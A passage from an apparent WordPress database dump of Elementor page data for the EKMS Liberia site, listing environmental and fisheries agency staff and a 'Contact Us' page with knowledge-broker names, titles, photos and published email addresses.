<\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23215,3363,'_elementor_edit_mode','builder'),(23216,3363,'_elementor_template_type','wp-page'),(23217,3363,'_elementor_version','3.0.16'),(23218,3363,'_wp_page_template','default'),(23219,3363,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a 